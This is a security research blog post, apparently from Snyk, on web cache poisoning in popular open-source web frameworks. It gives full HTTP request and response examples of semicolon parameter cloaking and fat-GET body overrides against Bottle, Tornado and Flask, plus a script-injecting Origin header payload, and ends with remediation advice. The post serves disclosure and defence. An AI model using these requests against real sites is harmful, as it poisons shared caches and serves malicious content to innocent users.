
Cache poisoning in popular open source packages

Written by:
Adam Goldschmidt

January 18, 2021


Following research done by James Kettle from PortSwigger on web cache poisoning, Snyk’s Security Team decided to deepen our knowledge in this field and to explore these vulnerabilities in the open source domain. We focused our research on the most popular web frameworks in both npm and PyPI, such as Flask (Werkzeug), Bottle, Tornado, and DerbyJS.

This blog post provides an introduction to web cache poisoning and demonstrates why open source maintainers should take this issue into account. Furthermore, this blog provides vulnerability examples within well known open source frameworks that were found to be vulnerable during Snyk's initial research.

Cache poisoning explained

Web cache poisoning is an attack designed to trick the cache into serving malicious responses to valid requests. It is made possible by including unkeyed parameters in the request, which are saved in the cache but unrepresented in the cache key (hence: unkeyed). To fully understand how the attack works, the concept of web caching should be understood.

What is a cache proxy?

A cache proxy is part of a reverse proxy, an intermediary that sits between the client and the web server. When a user accesses a website, the proxy interprets and responds to requests on behalf of the origin server. Proxy caching is one of the features of a reverse proxy, allowing for faster delivery of responses to the user.

How does caching work?

Caching is storing frequently accessed content in order to speed up subsequent requests to access that content.

The cache uses cache keys to keep references to the stored responses. Typically, a cache key consists of the values of one or more request headers and a part of the URL.

For example, for the following HTTP request, the cache key might be localhost/p/?a=1.

GET /p/?a=1 HTTP/1.1
Host: localhost
Origin: example
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9

When receiving a new request, if the cache is able to find a matching cache key then the saved response will be served instead of generating a new response.

As can be seen in the example above, there are headers which can possibly affect the response but are not reflected in the cache key. This means that if we change their values, the response will get saved in the same cache “spot”, but with a different value.

The following table shows how three different requests are treated with the cache key defined as $host$query_args:

Host | Accept-Encoding | Query arguments | Cache key
example.com | gzip, deflate | ?q=search | example.com?q=search
example.com | identity | ?q=search | example.com?q=search
snyk.io | gzip, deflate | (none) | snyk.io

The first two rows have the same cache key despite having different Accept-Encoding values, therefore they will be cached in the same cache spot.
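The table can be reproduced with a minimal sketch. The cache_key helper below is hypothetical and only mimics a key defined as $host$query_args; it is not how any particular proxy is implemented.

```python
def cache_key(host: str, query_args: str) -> str:
    """Mimic a proxy cache key defined as $host$query_args (hypothetical helper)."""
    # Only the host and the raw query string take part in the key;
    # every other header, such as Accept-Encoding, is unkeyed.
    return f"{host}?{query_args}" if query_args else host


requests = [
    {"host": "example.com", "accept_encoding": "gzip, deflate", "query": "q=search"},
    {"host": "example.com", "accept_encoding": "identity", "query": "q=search"},
    {"host": "snyk.io", "accept_encoding": "gzip, deflate", "query": ""},
]

keys = [cache_key(r["host"], r["query"]) for r in requests]
for request, key in zip(requests, keys):
    print(f'{request["accept_encoding"]!r:18} -> {key}')
```

The first two requests collapse into a single key, so whichever response is stored first is the one both clients receive.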

Understanding unkeyed parameters


Inputs that aren’t part of the cache key are called unkeyed parameters. This becomes an issue when these parameters can cause malicious behavior in the application. For example, an attacker can turn a reflected XSS into a stored XSS. Let’s take this request for example:

GET / HTTP/1.1
Host: somesite.com
Origin: <script>alert(1)</script>
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9

Assuming that the Origin header is not keyed and is reflected unsanitized in the response, causing an XSS, every user that visits somesite.com/ will be served the malicious response until the cached response expires.
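To make the mechanism concrete, here is a toy simulation, assuming an in-memory dictionary as the cache and a deliberately vulnerable origin_server function. Both names are hypothetical and stand in for a real proxy and application.

```python
cache = {}  # maps cache key -> stored response body


def origin_server(headers: dict) -> str:
    # Deliberately vulnerable: reflects the Origin header without escaping.
    return f"<p>Origin: {headers.get('Origin', '')}</p>"


def cached_get(host: str, path: str, headers: dict) -> str:
    key = host + path  # Origin is not part of the key, so it is unkeyed
    if key not in cache:
        # Cache miss: ask the application and store whatever it returns.
        cache[key] = origin_server(headers)
    return cache[key]


# The attacker's request fills the cache entry for somesite.com/ ...
attacker = cached_get("somesite.com", "/", {"Origin": "<script>alert(1)</script>"})
# ... and a later visitor with a harmless Origin gets the same stored body.
victim = cached_get("somesite.com", "/", {"Origin": "https://somesite.com"})
```

The victim's own Origin value never reaches the application, because the lookup succeeds on the shared key before the request is forwarded.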

To learn more about cache poisoning and the possible attack vectors, I recommend reading the following posts by James Kettle: Practical Web Cache Poisoning and Web Cache Entanglement: Novel Pathways to Poisoning.

Exploring vulnerabilities within web frameworks

A web framework allows the developer to effortlessly generate HTTP responses. From Wikipedia: “Web frameworks provide a standard way to build and deploy web applications on the World Wide Web. Web frameworks aim to automate the overhead associated with common activities performed in web development.” Usually, these frameworks also include some security measures to make developers' lives even easier.

Developers often use web frameworks in conjunction with a cache proxy, such as NGINX or Varnish.

This research shows that many of today's popular frameworks are vulnerable to web cache poisoning out of the box, almost regardless of the cache proxy being used, unless the proxy is explicitly configured to defend against this sort of attack. Most developers are either not aware of that need or do not have sufficient knowledge to do so. The following attack vectors were tested against several web frameworks using NGINX and Varnish.

GET parameter cloaking in Python and Bottle


When an attacker can separate query parameters using a semicolon (;), the proxy (running with its default configuration) and the server may interpret the same request differently. The proxy usually does not treat the semicolon as a separator, so anything that follows it becomes part of the preceding parameter's value. If that parameter is unkeyed, as utm_* parameters usually are, the injected data is left out of the cache key, and a malicious request can be cached as if it were a completely safe one. The W3C recommendation specifies the ampersand as the separator (“Let strings be the result of strictly splitting the string payload on U+0026 AMPERSAND characters (&)”).

The most notable finding here was in Python’s own source code (CVE-2021-23336), which contains a function called parse_qsl that splits URL query parameters on semicolons as well as ampersands. Frameworks such as Tornado use this function to parse query parameters, which might lead to a web cache poisoning exploitation chain.

Bottle (CVE-2020-28473), Tornado, and Rack were found to be vulnerable. Let’s take a look at an example for this vector, exploiting Bottle.

An attacker sends q=cat as the parameter for a search box and overrides it with a different value by appending a second q parameter after a semicolon. Here are the request and the response:

GET /search/?q=cat&utm_content=1;q=dog! HTTP/1.1
Host: localhost
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

HTTP/1.1 200 OK
Server: nginx/1.19.6
Date: Wed, 06 Jan 2021 19:45:20 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 26
Connection: close
Cache-Control: max-age=10
X-Cache-Date: Wed, 06 Jan 2021 19:45:18 GMT
X-Cache: HIT

Your search query: dog!

Now let’s assume a real user searches for “cat” while the malicious response is still cached:

GET /search/?q=cat HTTP/1.1
Host: localhost
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

HTTP/1.1 200 OK
Server: nginx/1.19.6
Date: Wed, 06 Jan 2021 19:45:23 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 26
Connection: close
Cache-Control: max-age=10
X-Cache-Date: Wed, 06 Jan 2021 19:45:18 GMT
X-Cache: HIT

Your search query: dog!

The attacker was able to change the response to a legitimate request by replacing the search parameter. The reason is that the server sees three parameters here: q, utm_content, and then q again, and it overrides the value of the first q parameter with the last one. The proxy, on the other hand, splits only on the ampersand and treats the whole string 1;q=dog! as the value of utm_content. Since utm_content is unkeyed, the cache key would only contain localhost?q=cat.
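The two interpretations can be compared side by side. This is a sketch under assumptions: split_on_both is a hypothetical stand-in for a server-side parser that splits on both characters, the UNKEYED prefix list is an assumed proxy configuration, and the separator argument of urllib.parse.parse_qsl is only available in Python versions that include the fix for CVE-2021-23336.

```python
import re
from urllib.parse import parse_qsl

QUERY = "q=cat&utm_content=1;q=dog!"
UNKEYED = ("utm_",)  # assumption: the proxy drops utm_* parameters from the key


def split_on_both(query: str) -> list:
    """Hypothetical stand-in for a parser that splits on '&' and ';'."""
    pairs = []
    for field in re.split(r"[&;]", query):
        name, _, value = field.partition("=")
        pairs.append((name, value))
    return pairs


# Server view: three parameters; the last q overrides the first.
server_params = dict(split_on_both(QUERY))

# Proxy view: ampersand-only splitting, then unkeyed parameters are dropped.
proxy_pairs = parse_qsl(QUERY, separator="&")
keyed = [(k, v) for k, v in proxy_pairs if not k.startswith(UNKEYED)]

print(server_params["q"])  # value the application renders
print(keyed)               # parameters that end up in the cache key
```

The application renders the attacker's value while the key still describes a plain search for cat, which is exactly the mismatch the attack relies on.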

The remediation for this vulnerability is to use only an ampersand (&) as the query parameter separator unless the developer specifies otherwise. Werkzeug, for example, allows developers to specify a custom separator and uses the ampersand as the default. Bottle’s maintainers decided to fix this by no longer splitting query strings on ;, a change introduced in version 0.12.19. The Rails framework was also found to be vulnerable to this method (discovered by James Kettle, disclosed to us with the help of Jonathan Leitschuh), but this is not yet fixed at the time of writing.

GET body parameters (fat GET) vulnerabilities in Flask and Tornado


In some proxies, NGINX for example, it is possible to include body parameters in a GET request. While this is not strictly forbidden in the HTTP RFC (“A payload within a GET request message has no defined semantics; sending a payload body on a GET request might cause some existing implementations to reject the request”), several frameworks were found to include these parameters in built-in methods which are not explicitly used for body parameters.

This might lead to developers trying to fetch GET query parameters, but instead retrieving body parameters. These parameters are not keyed in the cache, which could lead to two problems:

Override of parameters

An attacker can override GET query parameters with GET body parameters and deliver the cached response to other users.

This issue was found in Tornado when used with NGINX.

Since Tornado gives precedence to the body parameters, it was possible to override innocent users' requests with malicious ones. Following our example from before, searching for a cat:

GET /search/?q=cat HTTP/1.1
Host: localhost
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Content-Type: application/x-www-form-urlencoded
Connection: close
Content-Length: 6

q=dog!

HTTP/1.1 200 OK
Server: nginx/1.19.6
Date: Wed, 06 Jan 2021 19:51:54 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 26
Connection: close
Cache-Control: max-age=10
X-Cache-Date: Wed, 06 Jan 2021 19:51:53 GMT
X-Cache: HIT

Your search query: dog!

Now when a user searches for “cat”, this would be the flow:

GET /search/?q=cat HTTP/1.1
Host: localhost
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

HTTP/1.1 200 OK
Server: nginx/1.19.6
Date: Wed, 06 Jan 2021 19:53:55 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 26
Connection: close
Cache-Control: max-age=10
X-Cache-Date: Wed, 06 Jan 2021 19:51:55 GMT
X-Cache: HIT

Your search query: dog!

If the application also has a reflected cross-site scripting (XSS) vulnerability, this technique can turn it into a stored XSS that is delivered to other users of the application.
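The override can be sketched with a toy proxy and handler. The handler below is an assumption that models the behavior described for Tornado (query and body arguments merged, body values winning); it is not Tornado's code, and proxy_get is a hypothetical cache that keys on the path and query string only.

```python
from urllib.parse import parse_qsl

cache = {}


def handler(query: str, body: str) -> str:
    # Assumption: the framework merges query and body arguments and lets
    # body values win, as described for Tornado above.
    args = dict(parse_qsl(query))
    args.update(parse_qsl(body))
    return f"Your search query: {args.get('q', '')}"


def proxy_get(path: str, query: str, body: str = "") -> str:
    key = f"{path}?{query}"  # the request body is never part of the key
    if key not in cache:
        cache[key] = handler(query, body)
    return cache[key]


poisoned = proxy_get("/search/", "q=cat", body="q=dog!")  # attacker
served = proxy_get("/search/", "q=cat")                   # regular user
```

Both calls share the key /search/?q=cat, so the regular user is served the response that was generated from the attacker's body.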

Injection of extra parameters

An attacker can inject additional parameters and deliver the cached response to other users. This is not as severe as the first option, but it can nonetheless be critical when chained with the right gadgets (one such example would be altering the request method by using _method in some implementations). This was proven to be possible in Flask.

GET /report HTTP/1.1
Host: localhost
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
Content-Type: application/json
Content-Length: 32

{"reason":"this is an extra field"}

This request would cause all subsequent requests of innocent users to contain the extra parameter.

Snyk found that multiple frameworks allowed this behavior. However, multiple maintainers contacted by us did not see this as a direct vulnerability in the context of their package. For this reason, Snyk has decided to not issue advisories for these issues.

However, it is possible to provide remediation within the packages themselves by disallowing developers from fetching body data using these ambiguous methods, as many developers use request.params as a convenience, without being aware of the implications. Another solution can be to not give precedence to the body parameters when using these ambiguous methods, as it allows overriding of legitimate query parameters.

For example, Werkzeug's maintainers decided to fix this by preventing request.values from using request.form in GET requests, while Tornado’s maintainers took a different approach and added a flag that makes the parsing of GET request bodies opt-in (not yet released at the time of writing).
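Both remediation ideas can be combined in a small sketch. The combined_values function and the BODY_METHODS set are hypothetical and written for illustration only; this is not the code that Werkzeug or Tornado shipped.

```python
from urllib.parse import parse_qsl

# Assumption: methods for which a form body is expected.
BODY_METHODS = {"POST", "PUT", "PATCH"}


def combined_values(method: str, query: str, body: str) -> dict:
    """Hypothetical combined accessor; not Werkzeug's or Tornado's actual code."""
    values = dict(parse_qsl(query))
    if method.upper() in BODY_METHODS:
        # Query values keep precedence; the body only adds missing names.
        for name, value in parse_qsl(body):
            values.setdefault(name, value)
    return values


print(combined_values("GET", "q=cat", "q=dog!"))
print(combined_values("POST", "q=cat", "q=dog!&page=2"))
```

With this shape, a GET body is ignored entirely, and even for methods that do carry a body a query parameter cannot be silently replaced.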

Scope of remediation

During this research, we identified numerous cases where the complexity of the attack vectors left maintainers unsure whether remediation was in the scope of the library they maintain or whether it should be dealt with at the proxy level.

There are a lot of different scenarios where a cache poisoning might take place, and it is not the web framework's responsibility to mitigate them all. With that being said, the web framework could help protect against some of them, by implementing additional defense-in-depth measures.

It can be argued that proxies should not ignore GET body parameters, as many implementations still use them. They can, however, include these parameters in the cache key as if they were query parameters. Moreover, frameworks can prevent developers from using ambiguous methods while still allowing the use of body parameters. The same goes for parameter cloaking: proxies should not use semicolons as separators because it’s not recommended in the RFC, but frameworks can allow semicolons only when the developer explicitly asks for them.

Minimizing the risk of cache poisoning as developers

Individual developers can decrease the threat of being vulnerable by adhering to these points:

  • Be aware of the cache key: If your server splits query arguments using a semicolon, make sure your cache proxy does the same. Furthermore, make sure your cache key contains the necessary headers to prevent attackers from using unkeyed parameters to achieve web cache poisoning.

  • Ignore GET body parameters unless they are needed for the flow of the program, and if so, make sure to only use them when needed.

  • Detect and fix other vulnerabilities within your application: Web cache poisoning is usually used in a chain of exploitation, where an attacker can deliver a malicious response to other users, for example turning a reflected XSS into a stored one. Developers should do their best to secure their applications against these common vulnerabilities even if they seem less severe.
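For Python applications served over WSGI, the second point could be approached with a small middleware. The sketch below is hypothetical: DropGetBody and echo_body_app are illustrative names, and a production deployment would also need to consider how its server handles unread request data on persistent connections.

```python
import io


class DropGetBody:
    """Hypothetical WSGI middleware that discards bodies on GET and HEAD requests."""

    def __init__(self, app):
        self.app = app

    def __call__(self, environ, start_response):
        if environ.get("REQUEST_METHOD", "").upper() in ("GET", "HEAD"):
            # Present an empty body to the application so that helpers which
            # merge query and form data cannot pick up unkeyed input.
            environ["CONTENT_LENGTH"] = "0"
            environ["wsgi.input"] = io.BytesIO(b"")
        return self.app(environ, start_response)


def echo_body_app(environ, start_response):
    # Tiny demo application: returns whatever body it was given.
    length = int(environ.get("CONTENT_LENGTH") or 0)
    body = environ["wsgi.input"].read(length)
    start_response("200 OK", [("Content-Type", "text/plain")])
    return [body]
```

Wrapping an application as DropGetBody(app) leaves POST requests untouched while ensuring that a body attached to a GET request never reaches the framework's parameter parsing.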

Summary

To conclude, this research shows that open source frameworks are vulnerable to web cache poisoning attacks almost regardless of the proxy being used (excluding some cases). While it is possible to mitigate these attacks at the proxy-level, many developers are not aware of these attack vectors and are not implementing the required safeguards at the cache/proxy level.

The purpose of this blog post was to raise awareness amongst the developer community. It covers only two possible vectors of web cache poisoning, and there are many more out there in the wild. Developers should try to follow the points mentioned above and always keep these peculiar vulnerabilities in mind.